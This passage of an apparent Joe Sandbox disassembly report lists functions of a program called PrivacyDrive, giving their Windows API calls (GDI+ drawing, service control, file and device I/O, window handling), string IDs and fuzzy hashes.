                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Gdip$Create$AllocBitmapClearCompatibleFromGraphicsHintObjectRenderingScan0SelectText
                                • String ID:
                                • API String ID: 2362702511-0
                                • Opcode ID: feb46c05903e1c5d074e86a44ef3e7b11108a4ee4eb49ed9725f92b6ec00a1d2
                                • Instruction ID: cfc07241ca65fda0a3d5711262874b255f10238e8603e7bf986d32a52348c60a
                                • Opcode Fuzzy Hash: feb46c05903e1c5d074e86a44ef3e7b11108a4ee4eb49ed9725f92b6ec00a1d2
                                • Instruction Fuzzy Hash: F0417975A00746EFDB609F25DC05B6ABBE8FF45310F10852EE855D72A0EB35E810DB94
                                Function 004CB6C0 Relevance: 10.6, APIs: 7, Instructions: 98COMMON
                                Download Yara Rule
                                APIs
                                • GdipCreateImageAttributes.GDIPLUS(?,7563D392), ref: 004CB6F6
                                  • Part of subcall function 004CB610: GdipSetImageAttributesColorMatrix.GDIPLUS(?,00000001,00000001,?,00000000,00000000), ref: 004CB697
                                • GdipGetImageHeight.GDIPLUS(?,00000000,00000000,00000000), ref: 004CB729
                                • GdipGetImageWidth.GDIPLUS(?,?), ref: 004CB74C
                                • GdipGetImageHeight.GDIPLUS(?,00000000), ref: 004CB769
                                • GdipGetImageWidth.GDIPLUS(?,00000000), ref: 004CB783
                                • GdipDrawImageRectRectI.GDIPLUS(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00000002,00000000,00000000,00000000), ref: 004CB7B4
                                • GdipDisposeImageAttributes.GDIPLUS(00000000), ref: 004CB7CB
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: GdipImage$Attributes$HeightRectWidth$ColorCreateDisposeDrawMatrix
                                • String ID:
                                • API String ID: 4130812555-0
                                • Opcode ID: d09d500d7309e5c5d1e87975e270e9c4c281bc36e7f22bf7e5008d54abdea5aa
                                • Instruction ID: c0d227519754e4b39b19ccc4e1cce4b975024998ed42df57f921cb8346773cb4
                                • Opcode Fuzzy Hash: d09d500d7309e5c5d1e87975e270e9c4c281bc36e7f22bf7e5008d54abdea5aa
                                • Instruction Fuzzy Hash: D44105B690020AEFDF11CF94CD41B9EBBB8FB08710F10852AE915A6690E735A914DFA4
                                Function 0041C730 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 70COMMON
                                Download Yara Rule
                                APIs
                                • SHGetFileInfoW.SHELL32(00000000,00000000,?,000002B4,00000000), ref: 0041C7BF
                                • ShellExecuteW.SHELL32(00000000,OPEN,Explorer.exe ,00000000,0056C344,00000005), ref: 0041C7E4
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: ExecuteFileInfoShell
                                • String ID: !@$%c:\$Explorer.exe $OPEN
                                • API String ID: 1133623499-2802593334
                                • Opcode ID: 015de67119340627b675fe1f80bda14d1ac628fb28006b9ab4842001112d76a2
                                • Instruction ID: ff612def2dd17d2acbf77aef04f1b3c5f8c4cc232cdfc81b404466fdaa2c8c8f
                                • Opcode Fuzzy Hash: 015de67119340627b675fe1f80bda14d1ac628fb28006b9ab4842001112d76a2
                                • Instruction Fuzzy Hash: 7A3128B1E40249EFDB00DF94C849BEEBBB4FB08718F104629E515B72C0D7B46648CBA5
                                Function 004196B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69COMMON
                                Download Yara Rule
                                APIs
                                • GdipResetPath.GDIPLUS(?,?,?,7348BEC0,?,0041743C), ref: 004196C3
                                • GdipAddPathArcI.GDIPLUS(?,?,?,<tA,<tA), ref: 004196FC
                                • GdipAddPathArcI.GDIPLUS(?,?,?,?,?), ref: 00419726
                                • GdipAddPathLineI.GDIPLUS(?,?,00000044,00000000,00000044,?,?,?,?), ref: 0041973F
                                • GdipClosePathFigure.GDIPLUS(?,?,00000044,00000000,00000044,?,?,?,?), ref: 0041974E
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: GdipPath$CloseFigureLineReset
                                • String ID: <tA
                                • API String ID: 2147720564-2562197522
                                • Opcode ID: bff98cd3ea13e52b3520d185215e46741d522d5054ca37735d535be176ef0666
                                • Instruction ID: 7d0619f2148fba08b5a944834efcd86dca7f7e835bd715ea69931eb96bbb399b
                                • Opcode Fuzzy Hash: bff98cd3ea13e52b3520d185215e46741d522d5054ca37735d535be176ef0666
                                • Instruction Fuzzy Hash: 3E211AB1210209EFEB209F64DD54A6B7BE9EF44741F14882EF898CB610E731EC54DB60
                                Function 0042D920 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 62registryCOMMON
                                Download Yara Rule
                                APIs
                                • InitializeCriticalSection.KERNEL32(?,7563D392), ref: 0042D964
                                • LoadCursorW.USER32 ref: 0042D9CF
                                • RegisterClassExW.USER32(00000030), ref: 0042D9F8
                                • __CxxThrowException@8.LIBCMT ref: 0042DA13
                                  • Part of subcall function 00502BEB: RaiseException.KERNEL32(?,?,7563D392,005A7F20,?,?,?,?,?,004FFD4E,7563D392,005A7F20,?,00000001), ref: 00502C40
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: ClassCriticalCursorExceptionException@8InitializeLoadRaiseRegisterSectionThrow
                                • String ID: 0$cbfx_ToolTipWnd
                                • API String ID: 3973570152-2891778664
                                • Opcode ID: d2bfa9254c5a9399fbfeff2b5c6ff6f6bd7ed940b14d4e6d8447451aa89bf43f
                                • Instruction ID: 0816f756a4affe7a5ed8ae850ec2b9015f5fcde0ff059251d05ff4d2e5500aa3
                                • Opcode Fuzzy Hash: d2bfa9254c5a9399fbfeff2b5c6ff6f6bd7ed940b14d4e6d8447451aa89bf43f
                                • Instruction Fuzzy Hash: 07216BB1C04748EBDB10DFA4D8587DEBBF8FB19718F10421AE455A7280DBB92608CB94
                                Function 0041CAC0 Relevance: 10.6, APIs: 7, Instructions: 62servicesleepCOMMON
                                Download Yara Rule
                                APIs
                                • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,?,00000000,?,?,?,?,?,?,?,?,0041D6F6), ref: 0041CADD
                                • OpenServiceW.ADVAPI32(00000000,?,000F01FF,75A90460,?,?,?,?,?,?,?,?,0041D6F6), ref: 0041CAF2
                                • QueryServiceStatus.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,0041D6F6), ref: 0041CB05
                                • ControlService.ADVAPI32(00000000,00000001,?), ref: 0041CB1C
                                • Sleep.KERNEL32(000003E8), ref: 0041CB2B
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,?,0041D6F6), ref: 0041CB3F
                                • CloseServiceHandle.ADVAPI32(?,?,?,?,?,?,?,?,?,0041D6F6), ref: 0041CB48
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Service$CloseHandleOpen$ControlManagerQuerySleepStatus
                                • String ID:
                                • API String ID: 2392001508-0
                                • Opcode ID: 93c0597d7f6d3f305b6bd380c0fbc275057bf914ba3f2ea24e6ac84f62fc742a
                                • Instruction ID: c5cb1436c4bc0efe16229dfba2ba0720ab17fcceebc76af20323e9dd464628dd
                                • Opcode Fuzzy Hash: 93c0597d7f6d3f305b6bd380c0fbc275057bf914ba3f2ea24e6ac84f62fc742a
                                • Instruction Fuzzy Hash: C311A731A45308ABDB119B65AC9D9BFB6BCEB59711F00002AF901D2260DA289C44D7A4
                                Function 004CB190 Relevance: 10.6, APIs: 7, Instructions: 55COMMON
                                Download Yara Rule
                                APIs
                                • GdipDeleteGraphics.GDIPLUS(?,?,?,?,?,004CB3FB,?,00000001,?,7563D392,?,?,00000001,?,?), ref: 004CB1A9
                                • GdipFree.GDIPLUS(?,?,?,004CB3FB,?,00000001,?,7563D392,?,?,00000001,?,?), ref: 004CB1B0
                                • GdipDeleteGraphics.GDIPLUS(?,?,?,?,?,004CB3FB,?,00000001,?,7563D392,?,?,00000001,?,?), ref: 004CB1D0
                                • GdipFree.GDIPLUS(?,?,?,004CB3FB,?,00000001,?,7563D392,?,?,00000001,?,?), ref: 004CB1D7
                                • SelectObject.GDI32(?,00000000), ref: 004CB1ED
                                • DeleteDC.GDI32(?), ref: 004CB1F6
                                • DeleteObject.GDI32(?), ref: 004CB204
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: DeleteGdip$FreeGraphicsObject$Select
                                • String ID:
                                • API String ID: 2113326488-0
                                • Opcode ID: 01c80191abf64cda26f1c7843de9fb114df4b4a9167708fcd9010ce02e6e66c1
                                • Instruction ID: 21ee3c5524e4653023971180eeb74aebda1d4dd7ddaf7a08cdd644d00ba92d11
                                • Opcode Fuzzy Hash: 01c80191abf64cda26f1c7843de9fb114df4b4a9167708fcd9010ce02e6e66c1
                                • Instruction Fuzzy Hash: 9E119E396013009FDB208F65E869F2BBB68FF5A752F18401EF8459B220DB34E881DB94
                                Function 0052D0A0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 49COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: __wfopen_s$__fread_nolock__fsopen_setvbuf
                                • String ID: /dev/random$/dev/urandom
                                • API String ID: 2173266585-2325634460
                                • Opcode ID: 06f05d56831de38bb0ddf0936c802be27e4765ba28d04b8b6716e5daf9a6aee4
                                • Instruction ID: c37cec1942471a622defb6984fa6e8fc9630bf4513f28c59c907f06db8800d56
                                • Opcode Fuzzy Hash: 06f05d56831de38bb0ddf0936c802be27e4765ba28d04b8b6716e5daf9a6aee4
                                • Instruction Fuzzy Hash: B101D071E4010977EF1066A09D0BF997F69FF50751F1000A1FE04A1191FBB29F1457A5
                                Function 004328D0 Relevance: 10.5, APIs: 7, Instructions: 46windowCOMMON
                                Download Yara Rule
                                APIs
                                • IsWindow.USER32(?), ref: 004328E8
                                • SetForegroundWindow.USER32(?), ref: 004328FA
                                • SetActiveWindow.USER32(?), ref: 00432901
                                • SetFocus.USER32(?), ref: 00432908
                                • IsWindow.USER32(?), ref: 00432925
                                • PostMessageW.USER32(?,00001291,00000000,00000000), ref: 0043293B
                                • PostMessageW.USER32(00000111,000004CD,00000000), ref: 00432955
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Window$MessagePost$ActiveFocusForeground
                                • String ID:
                                • API String ID: 1146036800-0
                                • Opcode ID: d79ed0016456b9863de02d6c926446c8dc0fc2d0b89a1e16db376c144f5a7a8e
                                • Instruction ID: fb209e714518314ed58dd9571d855abad5a87996f1d965368c8482afb7b458e6
                                • Opcode Fuzzy Hash: d79ed0016456b9863de02d6c926446c8dc0fc2d0b89a1e16db376c144f5a7a8e
                                • Instruction Fuzzy Hash: E50128317017119BCA604F21EE58F8B77A4BF09B11F594815F502E7270C7A4FC04AFA8
                                Function 00432830 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 27COMMON
                                Download Yara Rule
                                APIs
                                • TryEnterCriticalSection.KERNEL32(005BDCCC), ref: 00432838
                                • LeaveCriticalSection.KERNEL32(005BDCCC,Dialog,ABOUT), ref: 0043285F
                                • LeaveCriticalSection.KERNEL32(005BDCCC), ref: 00432880
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: CriticalSection$Leave$Enter
                                • String ID: ABOUT$Dialog$PZ
                                • API String ID: 2978645861-249930596
                                • Opcode ID: cba18fcffbd0c45ab9fa1429afe84754c5a418fca25a3acd2b67c52f4c9be613
                                • Instruction ID: 8ca57c0a3f58d85f79402588146db724044dd59a8af55aee35a5af35a4078422
                                • Opcode Fuzzy Hash: cba18fcffbd0c45ab9fa1429afe84754c5a418fca25a3acd2b67c52f4c9be613
                                • Instruction Fuzzy Hash: ECE0923434070182DA247733BE2E6973D50BB09702F041835FB05C1282F9D8EC05C6B4
                                Function 00452BD0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 27COMMON
                                Download Yara Rule
                                APIs
                                • TryEnterCriticalSection.KERNEL32(005BDCCC,?,00452C48,?,?,?,?,004AE6B7,7563D392), ref: 00452BD8
                                • LeaveCriticalSection.KERNEL32(005BDCCC,Dialog,SETTINGS,?,?,?,?,004AE6B7,7563D392), ref: 00452BFF
                                • LeaveCriticalSection.KERNEL32(005BDCCC,004AE6B7,7563D392), ref: 00452C20
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: CriticalSection$Leave$Enter
                                • String ID: Dialog$PZ$SETTINGS
                                • API String ID: 2978645861-1332101884
                                • Opcode ID: 440bbcd3fca59089a2c4ddf002d8bdab942eb8cbbd74ebc0b7fbc782759d7c59
                                • Instruction ID: 0606c9d6145a4580e85d365bf4a589958a5dba53dbfc7efd7d7dccf5874f03cd
                                • Opcode Fuzzy Hash: 440bbcd3fca59089a2c4ddf002d8bdab942eb8cbbd74ebc0b7fbc782759d7c59
                                • Instruction Fuzzy Hash: 17E06D3424070193DA1067727E2A69B2D60BB16B43F054426BA05C1282FAD49808C2A4
                                Function 00442770 Relevance: 9.3, APIs: 6, Instructions: 254fileCOMMON
                                Download Yara Rule
                                APIs
                                • CloseHandle.KERNEL32(FFFFFFFF), ref: 004428A4
                                  • Part of subcall function 00441E60: PathFileExistsW.SHLWAPI(?), ref: 00441F50
                                • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00442842
                                • GetLastError.KERNEL32 ref: 00442854
                                  • Part of subcall function 004A4000: FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,00402DC2,00000000,00000000,?,00000000), ref: 004A4020
                                  • Part of subcall function 004A4000: LocalFree.KERNEL32(00000000), ref: 004A404A
                                • GetFileSizeEx.KERNEL32(00000000,?), ref: 004428EC
                                • SetWindowPos.USER32(00000000), ref: 00442A67
                                • SetWindowPos.USER32(00000000), ref: 00442AC3
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: File$Window$CloseCreateErrorExistsFormatFreeHandleLastLocalMessagePathSize
                                • String ID:
                                • API String ID: 2653568980-0
                                • Opcode ID: cac22ca033d805942b6f281306a9e5d6a5eff9c87083a835d65461da258e1b67
                                • Instruction ID: 6834c9339f2e4e944b2da7b2f29193971ddf44d81f186bdebd80bacb9191c911
                                • Opcode Fuzzy Hash: cac22ca033d805942b6f281306a9e5d6a5eff9c87083a835d65461da258e1b67
                                • Instruction Fuzzy Hash: 2FA18D707007018BEB24EF35C999BAAB7E5BF84314F400A1EF9569B3D1DBB8A845CB45
                                Function 00410900 Relevance: 9.2, APIs: 2, Strings: 4, Instructions: 207COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 004A5820: wsprintfW.USER32 ref: 004A584E
                                  • Part of subcall function 004A5820: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,00000000,00000000), ref: 004A586D
                                • CloseHandle.KERNEL32(?,7563D392,?,00000001), ref: 00410B26
                                  • Part of subcall function 00477320: DeviceIoControl.KERNEL32(?,07770C2C,00000000,00000000,00000000,00000004,?,00000000), ref: 0047734C
                                  • Part of subcall function 004FFCFE: _malloc.LIBCMT ref: 004FFD16
                                  • Part of subcall function 004A72E0: DeviceIoControl.KERNEL32(?,07770C40,00000000,00000285,00000000,00000285,?,00000000), ref: 004A736D
                                  • Part of subcall function 004A72E0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 004A7390
                                • GetLastError.KERNEL32(00000000,00000001,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00410AB5
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
